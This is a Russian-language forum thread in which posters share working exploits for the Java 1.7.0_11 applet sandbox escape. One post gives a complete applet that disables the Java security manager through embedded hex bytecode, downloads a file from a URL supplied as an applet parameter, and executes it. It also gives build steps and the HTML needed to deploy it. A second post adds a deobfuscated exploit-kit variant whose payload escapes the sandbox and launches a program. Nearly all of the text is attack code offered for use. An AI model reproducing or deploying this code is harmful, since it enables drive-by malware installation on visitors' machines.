1.7.0.11 with HLS bypass

[neko]

так как сплойт утек в паблик, выкладываю свой вариант вместе с обходом high level security:

Сам .class:

import java.net.URL;
import java.net.URLConnection;
import java.nio.charset.MalformedInputException;
import java.io.*;
import java.applet.*;
import java.lang.*;
import com.sun.jmx.mbeanserver.*;
import java.lang.reflect.Method;
import javax.management.ReflectionException;

public class Exploit extends Applet
 {

    private Method getMethod(Class classObject, String methodName, boolean onlyNullArgs)
    {
        try
        {
            Method[] methods = (Method[])Introspector.elementFromComplex((Object)classObject, "declaredMethods");
            for(Method method : methods)
            {
                String name = method.getName();
                Class[] types = method.getParameterTypes();
                
                if(name != methodName)
                    continue;
                
                if(onlyNullArgs && types.length != 0)
                    continue;
                
                return method;
                
            }
        }
        catch(Exception e)
        {
            e.printStackTrace();
        }
        return null;
    }
    
    public void start()
    {
        try
        {
            Class classContext = loadClass(@"sun.org.mozilla.javascript.internal.Context");
            Class classDefiningClassLoader = loadClass(@"sun.org.mozilla.javascript.internal.DefiningClassLoader");
            
            Method methodContextEnter = getMethod(classContext, @"enter", true);
            Object ctx = methodContextEnter.invoke(null);
            
            Method methodContextCreateClassLoader = getMethod(classContext, @"createClassLoader", false);
            Object classLoader = methodContextCreateClassLoader.invoke(ctx, new Object[]{null});
            
            // DisableSecurity.class bytecode
            String s = "CAFEBABE00000033002D0A0007001B0A001C001D07001E0A0003001F0A002000210700220700230700240100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010001650100294C6A6176612F73656375726974792F50726976696C65676564416374696F6E457863657074696F6E3B0100047468697301000A4C44697361626C65723B01000D537461636B4D61705461626C6507002207001E01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A457863657074696F6E7307002501000A536F7572636546696C6501000D44697361626C65722E6A6176610C0009000A0700260C002700280100276A6176612F73656375726974792F50726976696C65676564416374696F6E457863657074696F6E0C0029000A07002A0C002B002C01000844697361626C65720100106A6176612F6C616E672F4F626A6563740100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E0100136A6176612F6C616E672F457863657074696F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B01000F7072696E74537461636B54726163650100106A6176612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A6176612F6C616E672F53656375726974794D616E616765723B2956002100060007000100080000000200010009000A0001000B0000007800010002000000122AB700012AB8000257A700084C2BB60004B1000100040009000C00030003000C0000001A0006000000070004000A0009000F000C000C000D000E00110010000D000000160002000D0004000E000F0001000000120010001100000012000000100002FF000C00010700130001070014040001001500160002000B00000034000100010000000601B8000501B000000002000C0000000A00020000001400040016000D0000000C000100000006001000110000001700000004000100180001001900000002001A";
            byte[] byteCode = hex2str(s);
            Method methodClassLoaderDefineClass = getMethod(classDefiningClassLoader, @"defineClass", false);
            Class securityDisabler = (Class)methodClassLoaderDefineClass.invoke(classLoader, null, byteCode);
            
            securityDisabler.newInstance();
            String url = this.getParameter("j329");
            run(url);

            
  
        }
        catch(ReflectionException e)
        {
            e.printStackTrace();

        }
        catch(Exception e)
        {
            e.printStackTrace();
        }

    }
    
    private byte[] loadByteCode(String name) throws IOException
    {
        byte[] temp = new byte[8149];
        
        ByteArrayOutputStream outStream = new ByteArrayOutputStream();
        InputStream inStream = getClass().getResourceAsStream(name);
        
        int length;
        while((length = inStream.read(temp)) > 0)
        {
            outStream.write(temp, 0, length);
        }
        
        return outStream.toByteArray();
    }

    
    private Class loadClass(String name) throws ReflectionException
    {
        ClassLoader a = null;
        

        JmxMBeanServer server = (JmxMBeanServer)JmxMBeanServer.newMBeanServer("", null, null, true);
        MBeanInstantiator instatiator = server.getMBeanInstantiator();
        return instatiator.findClass(name, a);        
    }
    
    private static byte[] hex2str(String s)
    {
        byte[] buffer = new byte[s.length()/2];
        for(int i = 0; i < s.length(); i+=2)
        {
            byte n = (byte)((Character.digit(s.charAt(i), 16) << 4) + (Character.digit(s.charAt(i+1), 16)));
            buffer[i/2] = n;
        }
        return buffer;

    }

    public void run(String url)
    {
       try
        {
            String file = download(url);
            if(file != "")
            {
                execute(file);
            }
            
        }
        catch(Exception e) {}
    
        return;
    }

    private static String getTempPath() throws IOException
    {
        File temp = File.createTempFile("aux-fn-ajkgh", ".tmp");
        return temp.getAbsolutePath();
    }

    private void execute(String file) throws IOException
    {
         Runtime.getRuntime().exec(file);
    }
    
    private String download(String path)
    {       
        try
        {
            URL url = new URL(path);
            URLConnection link = url.openConnection();
            
            File file = new File(getTempPath());
            BufferedInputStream streamInput = new BufferedInputStream(link.getInputStream());
            BufferedOutputStream streamOutput = new BufferedOutputStream(new FileOutputStream(file));
                
            byte[] buffer = new byte[1024];
                
            while(true)
            {
                int cnt = streamInput.read(buffer);
                if(cnt == -1)
                {
                    break;
                }
                    
                streamOutput.write(buffer, 0, cnt);
            }
                
            streamOutput.flush();
            streamOutput.close();
                       
            return file.getAbsolutePath();
        }
        catch(Exception e){}
        
        return "";
    }
}

Сериализация:

import java.io.ByteArrayOutputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;

public class SerApplet 
{
    
    public static void main(String args[]) throws IOException
    {
        ByteArrayOutputStream baos=new ByteArrayOutputStream();
        ObjectOutputStream oos=new ObjectOutputStream(baos);
        Exploit ts = new Exploit();
        ts.stop();
        oos.writeObject(ts);
        FileOutputStream fos=new FileOutputStream("Exploit.ser");
        fos.write(baos.toByteArray());
        fos.close();
    }
    
}

Компилируем оба класса, Exploit.class сохраняем. Далее делаем джарник для сериализатора

%JDK_PATH%\bin\jar.exe -cfe s.jar SerApplet *.class

Запускаем джарник сериализатора и получаем Exploit.ser.
Для использования нужно положить в корень Exploit.class и Exploit.ser, для запуска используем вот такой html

<html><head></head>
<body>
<applet object="Exploit.ser" width="1" height="1">
</applet></body></html>

 

[el-]

другой вариант из кул ек

/*
*   From Paunch with love (Java 1.7.0_11 Exploit)
*   
*   Deobfuscated from Cool EK by SecurityObscurity
*
*   https://twitter.com/SecObscurity
*/
import java.applet.Applet;
import com.sun.jmx.mbeanserver.Introspector;
import com.sun.jmx.mbeanserver.JmxMBeanServer;
import com.sun.jmx.mbeanserver.MBeanInstantiator;
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles.Lookup;
import java.lang.invoke.MethodType;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import javax.management.ReflectionException;
import java.io.*;

public class PaunchGift extends Applet
{
 
  public void init()
  {
    
    try
    {   
           int length;
           byte[] buffer = new byte[5000];
           ByteArrayOutputStream os = new ByteArrayOutputStream();
           
           // read in the class file from the jar
           InputStream is = getClass().getResourceAsStream("Payload.class");
           
           // and write it out to the byte array stream
           while( ( length = is.read( buffer ) ) > 0 )
               os.write( buffer, 0, length );
               
           // convert it to a simple byte array
           buffer = os.toByteArray();
            
          Class class1 = gimmeClass("sun.org.mozilla.javascript.internal.Context"); 
          
          Method method = getMethod(class1, "enter", true);
          Object obj = method.invoke(null, new Object[0]);
          Method method1 = getMethod(class1, "createClassLoader", false);
          Object obj1 = method1.invoke(obj, new Object[1]);
    
          Class class2 = gimmeClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader"); 
          Method method2 = getMethod(class2, "defineClass", false);
          
          Class my_class = (Class)method2.invoke(obj1, new Object[] { null, buffer });
          my_class.newInstance();
          Method m_outSandbox = my_class.getMethod("outSandbox", new Class[0]);
          m_outSandbox.invoke(null, new Object[] {});
      
    }
    catch (Throwable localThrowable){}
    
  }
    
  
   private Method getMethod(Class class1, String s, boolean flag)
  {
    try {
      Method[] amethod = (Method[])Introspector.elementFromComplex(class1, "declaredMethods");
      Method[] amethod1 = amethod;
      
      for (int i = 0; i < amethod1.length; i++) {
        Method method = amethod1[i];
        String s1 = method.getName();
        Class[] aclass = method.getParameterTypes();
        if ((s1 == s) && ((!flag) || (aclass.length == 0))) return method; 
      }
    } catch (Exception localException) {  }

    return null;
  }
  
  private Class gimmeClass(String s) throws ReflectionException, ReflectiveOperationException
  {
    Object obj = null;
    JmxMBeanServer jmxmbeanserver = (JmxMBeanServer)JmxMBeanServer.newMBeanServer("", null, null, true);
    MBeanInstantiator mbeaninstantiator = jmxmbeanserver.getMBeanInstantiator();
        
    Class class1 = Class.forName("com.sun.jmx.mbeanserver.MBeanInstantiator");
    Method method = class1.getMethod("findClass", new Class[] { String.class, ClassLoader.class });
    return (Class)method.invoke(mbeaninstantiator, new Object[] { s, obj });
  }
  
}

############################################### 
import java.lang.reflect.Method;
import java.security.AccessController;
import java.security.PrivilegedExceptionAction;

public class Payload implements PrivilegedExceptionAction
{
   
    public Payload()
    {
        try
        {
            AccessController.doPrivileged(this);
        }
        catch(Exception exception) { }
    }

    public Object run() throws Exception
    {
        Class cl = System.class; 
        Method m = cl.getMethod("setSecurityManager", new Class[] { SecurityManager.class });
        m.invoke(null, new Object[1]);
        return null;
    }

    public static void outSandbox() throws Exception
    {
        Runtime.getRuntime().exec("calc.exe");
    }
}

src: https://twitter.com/SecObscurity/status/304179429679177728